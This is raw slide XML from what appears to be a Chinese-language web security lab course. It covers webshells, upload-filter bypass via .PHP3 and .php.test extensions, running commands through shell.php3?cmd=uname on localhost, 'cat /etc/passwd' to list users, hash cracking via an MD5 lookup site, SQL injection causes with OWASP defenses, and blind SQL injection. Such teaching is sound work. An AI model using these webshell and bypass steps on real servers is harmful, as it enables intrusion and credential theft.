      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3063949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利用网络查询或密码破解工具得到密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>明文            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>://pmd5.com/</a:t>
            </a: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24" y="2251170"/>
            <a:ext cx="6753225" cy="3705225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227491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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就是以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门文件与网站服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目录下正常的网页文件混在一起，然后就可以使用浏览器来访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门，得到一个命令执行环境，以达到控制网站服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>账号密码登陆网站，找到上传文件位置，上传一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>脚本 ，如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件被过滤了则可选</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP3——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>绕</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>php.test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>绕</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤器，但</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>仍会将它视作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件，因为配置中没有对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件的处理器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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28</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424355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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开上传的图片，通过查看该页面的源代码，得到图片的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://localhost/admin/uploads/shell.php3?cmd=uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将运行在操作系统的命令信息并返回当前的内核（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>来得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到系统的完整的用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>列表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取当前的内核版本</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29</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321800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2524" y="589332"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>产生原因</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269640" y="2185509"/>
            <a:ext cx="9650218" cy="3424107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>太过于信任用户所输入的数据，未限制输入的字符数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>，未</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对用户输入的数据做潜在指令的检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>输入的数据包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>代码时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代码在服务端脚本的执行过程中被带入到数据库引擎当作一段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>执行，就会导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>注入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325616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41554"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1132764" y="1338026"/>
            <a:ext cx="10363826" cy="5063320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Defense Option 1: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Prepared </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Statements (with Parameterized Queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>使用具有参数化查询的预处理语句</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Defense Option 2: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Stored Procedures  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>标准存储过程编程结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Defense </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Option 3: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>White List Input Validation  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>使用白名单输入验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Defense Option 4: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>All User Supplied </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Input  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>查询放入用户输入之前转义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1826717" y="5419506"/>
            <a:ext cx="7993342" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>资料来源：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection Prevention Cheat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sheet]</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a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2058395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拓展实验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>盲注</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>为什么叫盲注</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与普通的注入不同的是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲注是一种通过向数据库请求真或假的问题然后根据回应来决定或判断答案的一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入式攻击。例如发现了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入点，但应用只提供了一个通用的错误页面，或者说提供了正常的页面，但与我们取回的内容只有细小差异（部分可能不可见或不易观察），这些就属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>盲注实质仍属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
